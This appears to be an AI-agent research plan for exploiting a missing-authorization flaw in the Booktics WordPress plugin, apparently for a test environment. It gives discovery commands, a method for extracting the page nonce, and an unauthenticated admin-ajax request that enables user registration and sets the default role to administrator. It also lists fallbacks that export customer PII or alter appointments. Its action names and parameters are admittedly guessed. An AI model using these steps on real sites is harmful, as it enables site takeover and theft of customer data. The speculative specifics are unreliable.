Booktics <= 1.0.16 - Missing Authorization

This research plan targets a Missing Authorization vulnerability in the Booktics plugin (<= 1.0.16). Since the source files are not provided, this plan focuses on identifying the specific vulnerable AJAX actions and exploiting them based on common "Missing Authorization" patterns in WordPress plugins.

---

1. Vulnerability Summary

The Booktics plugin (<= 1.0.16) fails to implement proper capability checks (e.g., current_user_can()) on one or more of its AJAX handlers. Specifically, functions registered with the wp_ajax_nopriv_ hook (accessible to unauthenticated users) or wp_ajax_ (accessible to any logged-in user) perform sensitive operations—such as modifying plugin settings, exporting data, or managing appointments—without verifying that the requester has administrative privileges.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Vulnerable Hooks (Potential): wp_ajax_nopriv_booktics_... or wp_ajax_booktics_...
• Action Parameter: action=booktics_[vulnerable_action]
• Authentication: Unauthenticated (if nopriv is used) or Subscriber-level (if only wp_ajax_ is used without capability checks).
• Payload Type: application/x-www-form-urlencoded

3. Discovery & Code Flow

The agent must first identify which AJAX action is vulnerable.

Step 1: Identify all AJAX handlers

grep -rnE "wp_ajax_nopriv_|wp_ajax_" wp-content/plugins/booktics/

Step 2: Analyze the callback functions
For each identified action (e.g., booktics_save_settings, booktics_export_data, booktics_delete_appointment), trace the callback function:

1. Locate the function definition: grep -rn "function [function_name]" wp-content/plugins/booktics/
2. Check for current_user_can('manage_options') or similar checks.
3. Check for check_ajax_referer (to see if a nonce is required).

Vulnerable Flow:
admin-ajax.php -> do_action('wp_ajax_nopriv_...') -> Vulnerable_Function() -> Performs update_option() or $wpdb->query() without checking permissions.

4. Nonce Acquisition Strategy

If the vulnerable function calls check_ajax_referer( 'booktics_nonce_action', 'security' ), the agent must retrieve a valid nonce.

1. Identify Nonce Localization:
   Search for wp_localize_script to find the JS object containing the nonce.

   grep -rn "wp_localize_script" wp-content/plugins/booktics/
   

2. Determine Triggering Page:
   Identify which shortcode or admin page enqueues the script. Common Booktics shortcodes: [booktics_appointment], [booktics_booking].
3. Create Page:

   wp post create --post_type=page --post_status=publish --post_title="Booking" --post_content="[booktics_appointment]"
   

4. Extract Nonce:
   Navigate to the newly created page and use browser_eval to extract the nonce:
   • Localization Key (Inferred): booktics_ajax_obj or booktics_params.
   • JS Command: browser_eval("window.booktics_ajax_obj?.nonce")

5. Exploitation Strategy

Assuming the identified vulnerable action is booktics_save_settings (common for this vulnerability type), which allows updating arbitrary WordPress options.

Request Details:

• Method: POST
• URL: http://[target]/wp-admin/admin-ajax.php
• Body:

  action=booktics_save_settings&security=[NONCE]&option_name=users_can_register&option_value=1
  

  (Note: If the action modifies plugin settings specifically, the parameters might be settings[registration_enabled]=1).

Payload for Privilege Escalation (if option update is possible):

1. Set users_can_register to 1.
2. Set default_role to administrator.

6. Test Data Setup

1. Install Booktics version 1.0.16.
2. Ensure a page with the Booktics shortcode exists to facilitate nonce extraction if needed.
3. Verify the initial state of the target setting:

   wp option get users_can_register
   wp option get default_role
   

7. Expected Results

• HTTP Response: 200 OK or {"success":true}.
• Impact: The plugin performs the action (e.g., updating a global WordPress option) despite the request being unauthenticated.

8. Verification Steps

After sending the exploit request, use WP-CLI to confirm the unauthorized change:

# Check if settings were changed
wp option get users_can_register
# Check if sensitive data was leaked (if the vulnerability was an export action)
# Check if an appointment was deleted/modified

9. Alternative Approaches

If booktics_save_settings is not the vulnerable action, the agent should look for:

1. booktics_export_customers: Check if it returns customer PII in the AJAX response.
2. booktics_cancel_appointment: Check if it allows canceling any appointment ID without ownership verification.
3. booktics_update_appointment_status: Check if it allows an unauthenticated user to mark appointments as "Paid" or "Confirmed".

Backup Discovery Command:

# Look for functions that take POST data and interact with options/database
grep -rP "update_option|wpdb->(insert|update|delete|query)" wp-content/plugins/booktics/ -B 10 | grep "_POST"